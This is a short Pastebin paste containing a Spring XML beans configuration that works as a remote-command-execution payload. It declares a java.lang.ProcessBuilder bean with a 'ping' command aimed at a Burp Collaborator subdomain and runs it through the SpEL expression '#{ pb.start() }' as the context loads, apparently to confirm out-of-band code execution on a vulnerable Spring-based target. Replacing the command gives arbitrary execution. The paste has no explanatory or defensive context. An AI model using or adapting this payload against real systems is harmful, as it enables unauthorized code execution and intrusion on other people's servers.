Advertisement
Guest User

Untitled

a guest
Aug 15th, 2018
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <beans xmlns="http://www.springframework.org/schema/beans"
  2. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3. xsi:schemaLocation="
  4. http://www.springframework.org/schema/beans
  5. http://www.springframework.org/schema/beans/spring-beans.xsd
  6. ">
  7. <bean id="pb" class="java.lang.ProcessBuilder">
  8. <constructor-arg value="ping rd811hc7kvheyence93ohmmygpmfa4.burpcollaborator.net" />
  9. <property name="whatever" value="#{ pb.start() }"/>
  10. </bean>
  11. </beans>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement